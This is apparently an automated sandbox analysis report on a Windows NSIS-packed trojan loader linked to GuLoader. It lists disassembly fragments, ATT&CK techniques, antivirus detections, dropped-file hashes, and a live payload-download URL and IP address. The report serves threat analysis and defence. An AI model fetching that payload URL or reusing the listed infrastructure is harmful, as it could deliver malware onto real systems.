    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35152 mov eax, dword ptr fs:[00000030h]4_2_36E35152
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E37120 mov eax, dword ptr fs:[00000030h]4_2_36E37120
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B136 mov eax, dword ptr fs:[00000030h]4_2_36D5B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61131 mov eax, dword ptr fs:[00000030h]4_2_36D61131
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D61131 mov eax, dword ptr fs:[00000030h]4_2_36D61131
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2BEE6 mov eax, dword ptr fs:[00000030h]4_2_36E2BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E2BEE6 mov eax, dword ptr fs:[00000030h] (3 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5BEC0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D6BEC0 mov eax, dword ptr fs:[00000030h] (8 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D8FEC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36DEFEC5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D63EF4 mov eax, dword ptr fs:[00000030h] (3 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D93EEB mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D93EEB mov eax, dword ptr fs:[00000030h] (2 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D63EE1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E19EDF mov eax, dword ptr fs:[00000030h] (2 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D67E96 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36DEDE9B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E0DEB0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E0DEB0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E1DEB0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D93E8F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5DEA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5DEA5 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36DEDEAA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5FEA0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D9BE51 mov eax, dword ptr fs:[00000030h] (2 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D75E40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E1DE46 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5BE78 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E09E56 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5DE10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D9BE17 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E35E37 mov eax, dword ptr fs:[00000030h] (3 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D61E30 mov eax, dword ptr fs:[00000030h] (2 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E33E10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D7DE2D mov eax, dword ptr fs:[00000030h] (3 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5BFD0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36DE3FD7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D91FCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D63FC2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E1BFC0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E1BFC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E33FC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D9BFEC mov eax, dword ptr fs:[00000030h] (3 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D71F92 mov ecx, dword ptr fs:[00000030h] (8 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D71F92 mov eax, dword ptr fs:[00000030h] (4 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D5FF90 mov edi, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36DA1FB8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36D9BFB0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 4_2_36E03F90 mov eax, dword ptr fs:[00000030h] (2 occurrences)
    Source: C:\Users\user\Desktop\3507071243740008011.exe; Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    MITRE ATT&CK Matrix (techniques per tactic; the number in parentheses is the count shown in the matrix cell):
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Privilege Escalation: Access Token Manipulation (1); Process Injection (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (11); Access Token Manipulation (1); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: Security Software Discovery (211); Virtualization/Sandbox Evasion (11); File and Directory Discovery (2); System Information Discovery (23); Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
    Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
    Sample:
    Source | Detection | Scanner | Label
    3507071243740008011.exe | 32% | ReversingLabs | Win32.Trojan.InjectorX
    3507071243740008011.exe | 100% | Avira | HEUR/AGEN.1337946

    Dropped files:
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll | 0% | ReversingLabs | -

    No Antivirus matches
    No Antivirus matches

    URLs:
    Source | Detection | Scanner | Label
    http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
    Contacted domains:
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    alfacen.com | 193.107.36.30 | true | false | - | unknown

    Contacted URLs:
    Name | Malicious | Antivirus Detection | Reputation
    https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.bin | false | - | unknown

    URLs from memory and binaries:
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | - | unknown
    http://www.ftp.ftp://ftp.gopher. | 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | - | unknown
    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | - | unknown
    http://nsis.sf.net/NSIS_ErrorError | 3507071243740008011.exe, 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000000.1654398706.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000004.00000000.2441682476.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
    https://alfacen.com/ | 3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767646001.0000000006B34000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727893517.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B45000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | - | unknown
    Contacted IPs:
    IP | Domain | Country | ASN | ASN Name | Malicious
    193.107.36.30 | alfacen.com | Bulgaria | 201200 | SUPERHOSTING_ASBG | false
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1538168
                  Start date and time:2024-10-20 17:48:09 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:3507071243740008011.exe
                  Detection:MAL
                  Classification:mal80.troj.evad.winEXE@2/8@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 47
                  • Number of non-executed functions: 305
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes were analyzed; report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: 3507071243740008011.exe
    Time | Type | Description
    11:50:47 | API Interceptor | 3x Sleep call for process: 3507071243740008011.exe modified
    Match (IP): 193.107.36.30
    Associated Sample Name / URL | Detection | Threat Name
    Potwierdzenie.exe | malicious | GuLoader
    Potwierdzenie.exe | malicious | GuLoader
    SKM_C16024100408500.vbs | malicious | GuLoader
    SKM_C25024100408500.vbs | malicious | GuLoader

    Match (domain): alfacen.com
    Associated Sample Name / URL | Detection | Threat Name | Context
    Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
    Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
    SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
    SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30

    Match (ASN): SUPERHOSTING_ASBG
    Associated Sample Name / URL | Detection | Threat Name | Context
    Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
    Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
    SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
    SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30
    Atlanta Office Interiors #024-010.pdf | malicious | Unknown | 185.45.66.155
    https://ipexcel-my.sharepoint.com/:u:/p/bhaskar/EXkHa_fTPjZKq-NlTqXIh7sBrIzBSy8pqbKPLGCEzX2rbA | malicious | Unknown | 185.45.66.155
    Arcadia Aerospace Industries LLC (Code qJG7x-ZymK9p-KYuh).html | malicious | Unknown | 193.107.36.200
    is homemade pepper spray legal uk 42639.js | malicious | GookitLoader | 185.45.67.220
    gUJak0onLk.elf | malicious | Unknown | 195.191.149.33
    INV90097.exe | malicious | FormBook | 164.138.218.177

    Match (JA3 fingerprint): 37f463bf4616ecd445d4a1937da06e19a
    Associated Sample Name / URL | Detection | Threat Name | Context
    Zm1EZ2IYr.exe | malicious | Vidar | 193.107.36.30
    Unlock_Tool_2.4.exe | malicious | Vidar | 193.107.36.30
    JuyR4wj8av.exe | malicious | Stealc, Vidar | 193.107.36.30
    SecuriteInfo.com.FileRepMalware.4445.21502.exe | malicious | Unknown | 193.107.36.30
    yAkRyU2LPe.exe | malicious | Vidar | 193.107.36.30
    EL7ggW7AdA.exe | malicious | Stealc, Vidar | 193.107.36.30
    y45bCpZY1I.exe | malicious | Vidar | 193.107.36.30
    xy894fdlWJ.exe | malicious | Vidar | 193.107.36.30
    SecuriteInfo.com.Win32.Evo-gen.14702.4787.exe | malicious | KoiLoader | 193.107.36.30
    4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll | malicious | Unknown | 193.107.36.30

    Match (dropped file): C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll
    Associated Sample Name / URL | Detection | Threat Name
    Potwierdzenie.exe | malicious | GuLoader
    Potwierdzenie.exe | malicious | GuLoader
    RICHIESTA_OFFERTA_RDO2400423.docx.doc | malicious | GuLoader
    Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | Remcos, GuLoader
    Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | GuLoader
    Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader
    Nutzen_Unterschrift_Planen#2024.com.exe | malicious | GuLoader
    Benefit_Signature_Plan#3762.com.exe | malicious | Remcos, GuLoader
    Benefit_Signature_Plan#3762.com.exe | malicious | GuLoader
    DHL SHIPPING DOCUMENTS.exe | malicious | Remcos, GuLoader
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11776
                                              Entropy (8bit):5.659026618805001
                                              Encrypted:false
                                              SSDEEP:192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
                                              MD5:9625D5B1754BC4FF29281D415D27A0FD
                                              SHA1:80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
                                              SHA-256:C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
                                              SHA-512:DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
    Joe Sandbox View:
    • Filename: Potwierdzenie.exe, Detection: malicious
    • Filename: Potwierdzenie.exe, Detection: malicious
    • Filename: RICHIESTA_OFFERTA_RDO2400423.docx.doc, Detection: malicious
    • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious
    • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious
    • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious
    • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious
    • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious
    • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious
    • Filename: DHL SHIPPING DOCUMENTS.exe, Detection: malicious
                                              Reputation:moderate, very likely benign file
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):275040
                                              Entropy (8bit):7.825277312996347
                                              Encrypted:false
                                              SSDEEP:6144:P5XT4JjPPEAaRnOn2Ve4a0GClPcj4/egfL:EzEAaRnd1aAPrz
                                              MD5:E8245DB6B6E54F7C0D63D57E8EFAF894
                                              SHA1:1F00810AEF27A4018360E9104B1E58F75E713E28
                                              SHA-256:70758486A5D02D9F560081520A6484D24AC0100BA38A66980CA6D618CE3DF224
                                              SHA-512:B79DB2F35357148C58481E0F2EC11802E0EA52BB37B73DE4E062763457671600D17DF228EE5FA0F41EBF52130954DD02D9BDA873DD20BD3777A2B2B3E2344A0F
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):46153
                                              Entropy (8bit):4.551881715223996
                                              Encrypted:false
                                              SSDEEP:768:KzRgvbCj7eXDwAX+Fg2mUrZunWT1xdtoQkaor4p2JEoAAJBIVjDdJ:Kq22EA4VZ8C1xdt7k34pGCAXILJ
                                              MD5:87AC38D040E1207012CF6AD9A83C6530
                                              SHA1:59E5A1243DCB479A5F3361E38F62D3DE6BBF4C55
                                              SHA-256:A5FE6A3AC0371EE8D3D089C3A69A68B25EBBB5F7362C469DF3EACBD2F627CB60
                                              SHA-512:98794621B3DDA069E1F9567922CCB9CDA7D3BBCBA3254AE179FCE24E7B4615E8AF4BE0A2D25858F1F0B495296D05BB6702819DADA90A963B3F89C5AC50FA0271
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 999x605, components 3
                                              Category:dropped
                                              Size (bytes):167813
                                              Entropy (8bit):7.749904770387752
                                              Encrypted:false
                                              SSDEEP:3072:icF5a5FZl5xa0SYazQR5dRfp3oVadIALnwP5kipQlMXG6g9:5r2x1SYkQR53fpoVABLnwRk0QKXRg9
                                              MD5:8C0739994C90303B65A05C6909A53B62
                                              SHA1:E43239AF385F8DED6EA2098D2A71A2AC9519E32B
                                              SHA-256:7E1835782673A877C8A4FF9A4E9E88A23D8FA54077B6E7E1D70FBDE5F3A9D66B
                                              SHA-512:65BB94BEE91A5581EC7BEFE758F2AD71235ED07DEDDC5B85F5E5719B62E2ADCEFDFB080C9DC5D5C67BC2DBA846C26B62E8E043DCF33F02F65B9B18FC4942277F
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....H.H....9Rhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Make>Canon</tiff:Make>. <tiff:Model>Canon DIGITAL IXUS 800 IS</tiff:Model>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>72/1</tiff:XResolution>. <tiff:YResolution>72/1</tiff:YResolution>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:YCbCrPositioning>1</tiff:YCbCrPositioning>. <tiff:Compression>6</tiff:Compression>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xap="http://ns.adobe.com/xap/1.0/">. <xap:ModifyDate>2008-12-25T21:16:15Z</xap:ModifyDate>. <xap:CreatorTool>Adobe
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):329924
                                              Entropy (8bit):4.933260234424776
                                              Encrypted:false
                                              SSDEEP:6144:sXxDu/qV1rYX0GEETHfS1YHoQccZ6eJ7Myv5CTV:shy/qSu6qJcZFJPBi
                                              MD5:562A26D4A57C23D2AE8BD4DECE37E771
                                              SHA1:A9830E759E670EB8D4EFC5320A112E44ECB389BA
                                              SHA-256:EDF2898EFF5E72AA11993272EB941C1CD992BB6243E4D2F5940BD88EDF9117CD
                                              SHA-512:50E8291CB30F1916A5FC41EC7A64C9690A5ABD2AA5B56277029AB04EBCA19769DA91C214C4098B7FC5A8E7E048EBACFC9CFD41540F613B65C1BFF92AEAC49496
                                              Malicious:false
                                              Reputation:low
                                              Preview:......s.......|Xkt........"..y....8W..........6.......g...k.X......G,..........Q...+...M......2....Vr......3....n...q^D.......J.-........l.........&....~.......E,..(d...e.....S......a........J...#............w..).......y.?....b.........\.............u...............y.6....].j..........y......4.......T...x......O7....E.....)...|.J.9..)...5c...^..'.......YA............#t...e.....}.....B......"............K..0...{......Z..,........\....X...D.y........j(...........l......*......0.........j.E6.......................t...................Bm-............N...`..................A..../{...(...hN...............k...X...Y.m...P......^....O?..........C.e........B..b............y..M...P...... y............|....}.8..H..........y................r.oS!.'..G...l.7.*.....q..tO..g.....,..........~.................?..............V.B.........B......n/..j...............e...........0.mo.b......Ix.....=..Q.!..G............Q\4n..........O.br.7....d.nvH.t.....`...b......A.+...1............j....w......T.
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):48084
                                              Entropy (8bit):4.914629993393861
                                              Encrypted:false
                                              SSDEEP:768:D/rnROkWNBnJ+9RlvYC45nQikaSOn/i7/nY1kakXzsDwft2EwNWBbTvMIQwBT:zrx8BnJ+lyzknku2kakXYDwcEcWbwoBT
                                              MD5:511E6E568EBCF13D5098054630C627AA
                                              SHA1:1B5AFC7023C138219737E23B00121C359BF8443F
                                              SHA-256:204A44F0D3C3B63E36B3A4865C029552CCD8AC1EAD3507456BEC7886D724BA54
                                              SHA-512:DC3088BA850BA2258715826CF985D417A6A138A9EF66F43EBC69EB18CEDA9F4B65686C3F70E2BA39E64AEB8B55B82F550EE603094F06B988DC122299183075E8
                                              Malicious:false
                                              Reputation:low
                                              Preview:.................3v......0...........8......n..m....i............d ...... ..........'..MDY...... ...|............-.....|....dt...........G...bC..J............~....?..@........?.k..................z..!........k........................i.......|f.....X.(.......N..X..v....>..e..................J.....T..........3."...p9...r....2........................<..".......qj...i.`.;........a..........v...k.......%.f......os.....,....(.*.....|...#...y.7....,...............c.......i.9H............L..sx...{....=.....N'..\...|.B.....U...&.........B1J<................A....1.....A}\.7.Q........7................K..............C%......8...G....a.................................T.Y.kB.........P............o...&.`....{...{..A.........f....`.........q..............d.............W.......1-...>..R.)s;".e......0..B...].....E........R..............`.......{'...........0...m........._t.........x..............#.p....@_3..j.o............................C......=`...........Nx....Q\......:....A....5...e......~..
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):501
                                              Entropy (8bit):4.284126845947256
                                              Encrypted:false
                                              SSDEEP:12:7Dvz9cWhFxJiWtT/ksqSYLbLGLW+/tbV90QhtdtmCq/oK6:vpJrilbgW+hHfmCq/ol
                                              MD5:5D2F45598C5DAD8A461CECDA82CA550E
                                              SHA1:D594FFDAE11463E5E35170D27C611182F16E038C
                                              SHA-256:65D3114548018688712A3B735E3B9BA63C2261A5DA9B6505D43378DE5E351B87
                                              SHA-512:BF9654722B7F313B0E5C9A755C0DA9D37930FA517CA43F36C97F6033C7C764ACACDAC8FDE143A9D89D33D9ED7CC4EE08A96A0DEB14D484E4ACB43E830CA15470
                                              Malicious:false
                                              Preview:wellcurbs realkreditlaan rhamnoses aluminiumfoliens needlecase gld.bromelin scoters mormoder klinges albigensianism sociolektens curpel shuttles awreck laboratorieopgave eksercerskoler..nonfederated sprinklingers multiplepoinding indfaldsvinkelen korttegnere opinionsmaalingernes exobiology.amazingly palikars accessibility matriarchical erstatningskravene dorns..reclaimant prepubescent unfairest lusiad uhmmedes proctodaeum sydslesvigers.stormwise septaemia rangsforskel flytteligt hardboard dentex,
                                              Process:C:\Users\user\Desktop\3507071243740008011.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):54488
                                              Entropy (8bit):4.944297757860882
                                              Encrypted:false
                                              SSDEEP:1536:BYkiahV7T7eAwz8ruqJUjhEXVM54+suwGXs:BFiahJTCAi8dQ6M54rWs
                                              MD5:4ECFFF116FE03C56DAD5B0EAE0279D00
                                              SHA1:18525703697F059B03F7A1F093317E62BAD43004
                                              SHA-256:593BF06B816C8CACBA83C6CCECD0C3F0F164C4D9CC7F9B4EA7BF2EA2F0CD7906
                                              SHA-512:D6EBCD15BEE3AD32BB91D7EFEAB363B917127ACF62A8838E621FFA0F080060E00E06BDACD9F2BDD4BE37DFC1A9449A4CE678BC1821E005BAEC3263272BF8877A
                                              Malicious:false
